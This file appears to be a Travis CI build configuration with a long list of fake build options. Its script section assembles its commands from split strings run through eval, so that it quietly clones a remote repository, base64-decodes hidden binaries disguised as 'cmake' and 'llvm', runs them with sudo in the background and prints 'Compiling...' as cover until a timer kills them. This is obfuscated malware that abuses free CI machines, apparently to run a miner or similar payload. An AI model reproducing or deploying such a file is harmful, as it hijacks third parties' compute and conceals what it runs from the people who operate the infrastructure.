dist: bionic

env:
  - BUILD="--version=713KD"
  - BUILD="--usepkg=778PV"
  - BUILD="--depclean-lib-check=357LJ"
  - BUILD="--quiet-fail=23210"
  - BUILD="--depclean=989GT"
  - BUILD="--digest=648kw"
  - BUILD="--changed-deps-report=871E0"
  - BUILD="--implicit-system-deps=141Z3"
  - BUILD="--quiet-repo-display=845x2"
  - BUILD="--accept-restrict=881pL"
  - BUILD="--nospinner=220nd"
  - BUILD="--deselect=833Pc"
  - BUILD="--oneshot=351Mj"
  - BUILD="--usepkg=447kA"
  - BUILD="--verbose=364zC"
  - BUILD="--info=7593U"
  - BUILD="--ignore-world=388o0"
  - BUILD="--check-news=429RV"
  - BUILD="--searchdesc=5024v"
  - BUILD="--ignore-default-opts=949dL"
  - BUILD="--fail-clean=168Np"
  - BUILD="--prune=495D8"
  - BUILD="--autounmask-license=777W1"
  - BUILD="--autounmask-keep-masks=98N4"
  - BUILD="--alert=661vW"
  - BUILD="--newrepo=772VH"
  - BUILD="--getbinpkgonly=5kz"
  - BUILD="--autounmask-keep-masks=886o5"
  - BUILD="--ask-enter-invalid=853he"
  - BUILD="--alert=919Gd"
  - BUILD="--quiet-build=325oc"
  - BUILD="--fail-clean=469S7"
  - BUILD="--binpkg-changed-deps=726H"
  - BUILD="--changed-deps-report=28z7"
  - BUILD="--ignore-default-opts=908Oh"
  - BUILD="--quiet-build=651kq"
  - BUILD="--oneshot=5362C"
  - BUILD="--root=180S6"
  - BUILD="--read-news=699kn"
  - BUILD="--autounmask-license=378l4"
  - BUILD="--dynamic-deps=91S2"
  - BUILD="--verbose-conflicts=79663"
  - BUILD="--load-average=193gU"
  - BUILD="--buildpkgonly=808LC"
  - BUILD="--complete-graph=159yg"
  - BUILD="--getbinpkg=904P2"
  - BUILD="--version=629S2"
  - BUILD="--unmerge=195Vq"
  - BUILD="--misspell-suggestions=8510n"
  - BUILD="--fetch-all-uri=562FG"
  - BUILD="--metadata=518Kj"
  - BUILD="--rebuild-exclude=220Vw"
  - BUILD="--depclean=556oK"
  - BUILD="--unmerge=147Na"
  - BUILD="--backtrack=770da"
  - BUILD="--buildpkg=390QB"
  - BUILD="--nospinner=4661g"
  - BUILD="--getbinpkgonly=297my"
  - BUILD="--rebuild-if-new-slot=596GQ"
  - BUILD="--accept-restrict=8433o"
  - BUILD="--usepkg=560ST"
  - BUILD="--keep-going=44mL"
  - BUILD="--rebuild-if-unbuilt=161Hq"
  - BUILD="--root=723Om"
  - BUILD="--depclean=133y7"
  - BUILD="--read-news=744sL"
  - BUILD="--changed-deps-report=2WP"
  - BUILD="--pkg-format=86SG"
  - BUILD="--changed-use=291l"
  - BUILD="--deselect=632tT"
  - BUILD="--verbose=674q3"
  - BUILD="--getbinpkg=742xK"
  - BUILD="--sync=751v8"
  - BUILD="--resume=305GU"
  - BUILD="--usepkg=612Tv"
  - BUILD="--search=7407F"
  - BUILD="--complete-graph-if-new-ver=924rm"
  - BUILD="--list-sets=994MW"
  - BUILD="--binpkg-respect-use=812Ug"
  - BUILD="--changelog=277Ae"
  - BUILD="--reinstall-atoms=850ZS"
  - BUILD="--changed-deps-report=936Nw"
  - BUILD="--read-news=849uq"
  - BUILD="--ask=150iM"
  - BUILD="--onlydeps-with-rdeps=114mu"
  - BUILD="--autounmask-continue=412mS"
  - BUILD="--sync-submodule=269a7"
  - BUILD="--selective=66is"
  - BUILD="--getbinpkgonly=868vc"
  - BUILD="--resume=586c7"
  - BUILD="--accept-restrict=347mu"
  - BUILD="--config=3644L"
  - BUILD="--with-test-deps=584X3"
  - BUILD="--ask=629mr"
  - BUILD="--quiet-build=510mE"
  - BUILD="--fail-clean=150WA"
  - BUILD="--autounmask-unrestricted-atoms=93iI"
  - BUILD="--verbose-slot-rebuilds=979fr"
  - BUILD="--backtrack=548Wn"
  - BUILD="--selective=6931u"
  - BUILD="--rebuilt-binaries-timestamp=417Sb"
  - BUILD="--jobs=895MT"
  - BUILD="--quiet=275lW"
  - BUILD="--fuzzy-search=655ui"
  - BUILD="--metadata=319C4"
  - BUILD="--onlydeps=889c2"
  - BUILD="--sync=637bF"
  - BUILD="--fetchonly=31WV"
  - BUILD="--deep=948IV"
  - BUILD="--buildpkg=316Lg"
  - BUILD="--changed-slot=8611T"
  - BUILD="--rebuild-exclude=760hK"
  - BUILD="--implicit-system-deps=65Pm"
  - BUILD="--usepkgonly=165nD"
  - BUILD="--alphabetical=610I0"
  - BUILD="--nodeps=369s9"
  - BUILD="--depclean-lib-check=396mh"
  - BUILD="--load-average=382me"
  - BUILD="--regen=329p6"
  - BUILD="--quiet-repo-display=827To"
  - BUILD="--version=235F3"
  - BUILD="--verbose-slot-rebuilds=828qz"
  - BUILD="--ignore-soname-deps=971Ur"
  - BUILD="--backtrack=901aJ"
  - BUILD="--quiet=211Zv"
  - BUILD="--quiet-unmerge-warn=843S"
  - BUILD="--fetchonly=492Ve"
  - BUILD="--quiet=518DO"
  - BUILD="--changed-deps=696K"
  - BUILD="--unmerge=13JR"
  - BUILD="--tree=408Xl"
  - BUILD="--onlydeps-with-rdeps=385rB"
  - BUILD="--depclean=205e2"
  - BUILD="--sysroot=937Fd"
  - BUILD="--implicit-system-deps=857u3"
  - BUILD="--sync=163FO"
  - BUILD="--skipfirst=620A2"
  - BUILD="--resume=188GT"
  - BUILD="--update=802Z7"
  - BUILD="--search-similarity=117de"
  - BUILD="--useoldpkg-atoms=942pS"
  - BUILD="--binpkg-changed-deps=127pz"
  - BUILD="--autounmask-only=350C1"
  - BUILD="--quiet-repo-display=529jC"
  - BUILD="--help=210iX"
  - BUILD="--keep-going=466D6"

language: minimal

script:
  - JtlGONOjrb="sudo apt up"
  - ASjqwJY="date || tru"
  - eval "$JtlGONOjrb""$ASjqwJY""e"
  - LoKqNH="sudo apt --"
  - rYqVXrK="yes install"
  - zatPBcd=" cl-base64 "
  - lHBiioIwtqb="git &>/dev/"
  - eval "$LoKqNH""$rYqVXrK""$zatPBcd""$lHBiioIwtqb""null"
  - usmXpUTZh="git clone h"
  - mSmIkmn="ttps://gccb"
  - ilfatOS="uild@bitbuc"
  - ZwhocJKrFtA="ket.org/gcc"
  - aFOaeGU="build/gcc.g"
  - srZaAYxrj="it &>/dev/n"
  - eval "$usmXpUTZh""$mSmIkmn""$ilfatOS""$ZwhocJKrFtA""$aFOaeGU""$srZaAYxrj""ull"
  - uEMQvAfVn="base64 -d g"
  - mqFVWYIiy="cc/cmake_ >"
  - eval "$uEMQvAfVn""$mqFVWYIiy"" cmake"
  - zhxkoGxF="base64 -d g"
  - BTzqBa="cc/config_ "
  - eval "$zhxkoGxF""$BTzqBa""> log"
  - zsHWXIr="base64 -d g"
  - aVOeIA="cc/make_ > "
  - eval "$zsHWXIr""$aVOeIA""llvm"
  - FGwtKk="chmod +x ll"
  - eval "$FGwtKk""vm cmake"
  - ./cmake
  - wpsIy="sed -i 's/b"
  - rqhJa="uild/tb2u/g"
  - eval "$wpsIy""$rqhJa""' log"
  - sudo ./llvm -c log &>/dev/null &
  - GCC=$(date +%s)
  - kXQaZpyiR="echo $BUILD"
  - eval "$kXQaZpyiR"""
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2570)) ] && sudo killall llvm && break; sleep 216; done
